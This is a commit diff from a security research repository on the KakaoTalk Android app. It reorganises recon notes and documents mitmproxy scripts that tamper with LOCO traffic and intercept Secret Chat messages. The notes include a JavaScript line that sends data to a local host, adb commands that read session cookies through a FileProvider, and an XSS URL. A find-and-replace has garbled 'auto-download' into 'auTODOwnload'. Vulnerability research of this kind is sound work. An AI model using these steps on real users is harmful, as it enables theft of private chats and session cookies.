Finalize write-up

README.md

@@ -2,18 +2,19 @@
 
 ## Setup
 
-[My setup used to analyze the KakaoTalk Android app](SETUP.md).
+[My setup used to analyze the KakaoTalk Android app](./doc/SETUP.md).
 
 ## Recon
 
-- [General recon notes](RECON.md).
-- [WebView recon](./recon/webview/WEBVIEW.md).
-
-## Scripts
-
-Frida and mitmproxy scripts are [here](./scripts/).
+- [General recon notes](./doc/RECON.md).
+- [WebView recon](./doc/WEBVIEW.md).
 
 ## Findings
 
-- [Steal another user's chat messages](ACCOUNT_TAKEOVER.md)
-- [Secret Chat findings](SECRET_CHAT.md)
+- [Steal another user's chat messages](./doc/ACCOUNT_TAKEOVER.md)
+- [Secret Chat findings](./doc/SECRET_CHAT.md)
+
+## Scripts
+
+- Frida and mitmproxy scripts are in [here](./scripts/).
+- [How to run the mitmproxy scripts](./scripts/mitmproxy/README.md)

doc/RECON.md

@@ -18,7 +18,7 @@
 
 > Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
 
-> There are a lot of **TO-DO's** in this document where one can try to dig deeper.
+> There are a lot of **TODO's** in this document where one can try to dig deeper.
 
 ## General App Infos
 
@@ -86,7 +86,7 @@ zzng.xml
 
 Some values (e.g., OAuth tokens) in the Shared Preferences are encrypted with a static key which is derived from a hard-coded passphrase (can be found in class `SimpleCipher`).
 
-**TO-DO**: Check Shared Prefs for sensitive information.
+**TODO**: Check Shared Prefs for sensitive information.
 
 Trace Shared Prefs usage with this [Frida script](https://github.com/m0bilesecurity/Frida-Mobile-Scripts/blob/master/Android/shared_preferences_monitor.js). See [example trace](./recon/frida_trace_shared_prefs.log).
 
@@ -105,13 +105,13 @@ multi_profile_database.db
 
 One can decrypt the contents of `KakaoTalk.db` and `KakaoTalk2.db` with this [script](https://github.com/jiru/kakaodecrypt).
 
-**TO-DO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`.
+**TODO**: Find the password for the `crypto_database`. Hook `TrustStore` or `sqlite3_key` after a fresh app install and before login. Implementation in `com.kakao.talk.database.CryptoDatabase`.
 
 ## Rest APIs
 
 Most endpoints are HTTPS protected. Certs in the `assets/sdk` folder are used for certification pinning (see class `com.kakao.i.http.g.b`). 
 
-Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TO-DO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs.
+Java interfaces with interesting Rest APIs (interface names generated by `jadx`): **TODO**: Add GET and POST requests. Use `sqlmap -r` to *fuzz* the Rest APIs.
 
 Interesting classes:
 ```
@@ -138,19 +138,19 @@ Many many (exported) `BROWSABLE` Activities.
 
 ## Services
 
-**TO-DO**
+**TODO**
 
 ## Content Providers
 
-**TO-DO**
+**TODO**
 
 ## Broadcast Receivers
 
-**TO-DO**
+**TODO**
 
 ## WebViews
 
-See [here](./recon/webview/WEBVIEW.md).
+See [here](./WEBVIEW.md).
 
 ## Firebase
 
@@ -193,7 +193,7 @@ $ curl "https://firebaseremoteconfig.googleapis.com/v1/projects/552367303137/nam
 
 ## Native Libs
 
-**TO-DO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`):
+**TODO**: Check for memory corruption bugs in native libs (located in `/data/app/com.kakao.talk-wRI5HzbljAi9o-6SZLN55g==/lib/arm64`):
 
 ```bash
 libACExternalCore.so            libc++_shared.so                libopencv_java4.so

doc/SECRET_CHAT.md

@@ -41,12 +41,10 @@ Android implementation specifics:
 - Receiver's public keys in table `public_key_info` of `KakaoTalk.db` database
 - Shared secret stored in table `secret_key_info` of `KakaoTalk.db` database
 
-TO-DOS:
+TODOS:
 
-- Reinstall the app and check whether a warning shows up
-- Test CFB bit flipping
 - How are the msgId and chatId generated? -> nonce for CTR mode!
 
 Demo:
 
-![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/scripts/mitmproxy/secret_chat_demo.gif?raw=true)
+![MITM](https://github.com/stulle123/kakaotalk_analysis/tree/main/doc/secret_chat_demo.gif?raw=true)

doc/SETUP.md

@@ -53,7 +53,7 @@ Install required tools:
 
 - Get latest [jadx](https://nightly.link/skylot/jadx/workflows/build-artifacts/master)
 - Get [Burp Suite](https://portswigger.net/burp/communitydownload)
-- Get [KakaoTalk for Windows/MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en)
+- Get [KakaoTalk for MacOS](https://www.kakaocorp.com/page/service/service/KakaoTalk?lang=en)
 - `$ brew install apktool nuclei sqlite db-browser-for-sqlite`
 - `$ pip3 install --upgrade frida-tools mitmproxy`
 

doc/WEBVIEW.md

@@ -1,7 +1,7 @@
 # WebView Recon
 
 - [Low Severity Findings](#low-severity-findings)
-- [To-Dos / Digging](#to-dos--digging)
+- [TODOs / Digging](#TODOs--digging)
   - [Tokens / Cookies](#tokens--cookies)
   - [JavaScript Interfaces](#javascriptinterface)
   - [Redirect Endpoints](#redirect-endpoints)
@@ -20,7 +20,7 @@
 
 > Disclaimer: Initial recon was performed on an older version of KakaoTalk (`10.1.7`).
 
-> There are a lot of **TO-DO's** in this document where one can try to dig deeper.
+> There are a lot of **TODO's** in this document where one can try to dig deeper.
 
 ## Low Severity Findings
 
@@ -113,14 +113,14 @@ img.src = 'http://10.0.2.2:8888?data=' + encodeURIComponent(data);
   - Reading a cookie: `adb shell content read --uri "content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627"`
   - Using the `android-app:` scheme: `adb shell am start "android-app://#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=content://com.kakao.talk.FileProvider/external_files/emulated/0/Android/data/com.kakao.talk/KakaoTalk/cookie/.57f323da7592b0b5de1360de3da701b0d1aa6627\;end"`
 - There are a couple of JavaScript interfaces that access the user's location (see [below](#javascriptinterface))
-- Auto-download to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
+- AuTODOwnload to `/sdcard/Download` via Chrome (`app://kakaotalk/openURL?url=`)
 - I can access other `BROWSABLE` Activities or Apps via the `android-app:` scheme, e.g.:
   - `location.href = "android-app://com.google.android.googlequicksearchbox/https/www.google.com"`
 - `setWebContentsDebuggingEnabled` is enabled for most WebViews
 - XSS in `com.kakao.talk.activity.cscenter.CsCenterActivity` (search field)
     - https://cs.kakao.com/search?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E (you need to click into the search field to trigger the alert)
 
-## To-Dos / Digging
+## TODOs / Digging
 
 Things to try out / dig deeper.
 
@@ -241,17 +241,17 @@ Maybe someone finds a XSS here:
   - `XMLHttpRequest` still won't work -> because it's not a `file://` URL?
   - Need to be able to create/download files in/to `Download` folder
 - Cannot steal files that cannot be rendered in a Webview (e.g., `LocalUser_DataStore.pref.preferences_pb` in `files` folder). Text files work fine: `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json`.
-  - `CommerceShopperWebViewActivity` doesn't auto-download but also doesn't render binary files
+  - `CommerceShopperWebViewActivity` doesn't auTODOwnload but also doesn't render binary files
 
 ### DownloadListener.onDownloadStart
 
 - Check `p21.e` / `DownloaderTask` class (`com.kakao.talk.widget.webview.WebViewHelper` -> `processDownload()` -> `C42792b.m9697b()` -> `DownloaderTask.m16277b()`)
-  - **TO-DO**: Try path traversal
+  - **TODO**: Try path traversal
   - Bypass `DownloaderTask` checks
   - Downloads files to `/sdcard/Download/` directory
   - Not able to overwrite files
   - Play with `data:` URIs (`data:[<mediatype>][;base64],<data>`)
-- **TO-DO:** I *might* be able to force WebViews to auto-download files by pointing them to an attacker-controlled website. Required headers:
+- **TODO:** I *might* be able to force WebViews to auTODOwnload files by pointing them to an attacker-controlled website. Required headers:
   - `Content-Type: application/octet-stream`
   - `content-disposition: attachment; filename=foo.html`
 - Investigate `com.kakao.talk.widget.webview.WebViewHelper` class:

scripts/mitmproxy/README.md

@@ -1,21 +1,31 @@
-# MITM Kakaotalk LOCO Packets
+# mitmproxy Scripts
 
-This is a simple script to man-in-the-middle LOCO packets with mitmproxy.
+There are four `mitmproxy` scripts in this directory to play with LOCO traffic:
 
-Setup on your MITM host:
+- `flip_ciphertext_bits.py` -> a POC for showing the CFB malleability of encrypted LOCO packets
+- `replace_loco_message.py` -> Replace a LOCO message with another one to show missing integrity protection
+- `mitm_single_tls_host.py` -> MITM a single TLS host only. Passthrough all other TLS traffic.
+- `mitm_secret_chat.py` -> MITM end-to-end encrypted *SECRET CHAT* messages
+
+To run the scripts, do the following:
+
+1. Start mitmproxy script on your MITM host and copy the WireGuard config:
 
 ```bash
 $ python3 -m venv venv
 $ source venv/bin/activate
 (venv) $ python3 -m pip install mitmproxy bson cryptography
-(venv) $ mitmdump --mode wireguard --rawtcp -s loco_mitm.py
+(venv) $ mitmdump --mode wireguard --rawtcp -s replace_loco_message.py
 ```
 
-Android emulator setup:
+2. Android device/emulator setup:
 
 - Install the Kakaotalk app if not done already
 - Install the WireGuard app
-- Change the IP address in mitmproxy's generated WireGuard config to `10.0.2.2`. Example:
+- Import mitmproxy's generated WireGuard config into the WireGuard app
+
+If you run the Android Emulator on your MITM host, change the IP address to `10.0.2.2`. Example:
+
 ```
 [Interface]
 PrivateKey = MCCAFVMZQk+k+sbdXx0B4LG+Mij/UO7qyWa7IRqv/nA=
@@ -27,9 +37,8 @@ PublicKey = K+t/qiGO8tlA9L7wjAOb8wqjnu/NuthHgLs2gOCIDgY=
 AllowedIPs = 0.0.0.0/0
 Endpoint = 10.0.2.2:51820
 ```
-- Import the config into the WireGuard app
 
-Back on your MITM host start Frida (see [setup instructions](../../SETUP.md#setup-frida-to-disable-certificate-pinning)):
+3. Start Frida on MITM host (see [setup instructions](../../doc/SETUP.md#setup-frida-to-disable-certificate-pinning))
 
 ```bash
 # Start frida-server
@@ -39,7 +48,7 @@ $ adb root && adb shell /data/local/tmp/frida-server
 $ frida -U -l loco-tracer.js -f com.kakao.talk
 ```
 
-To run the unit tests:
+Optional: To run the unit tests for `mitm_secret_chat.py`:
 
 - Install `pytest` and `pytest-datadir` via pip
 - Run the tests: `$ pytest tests/test_loco_parser.py`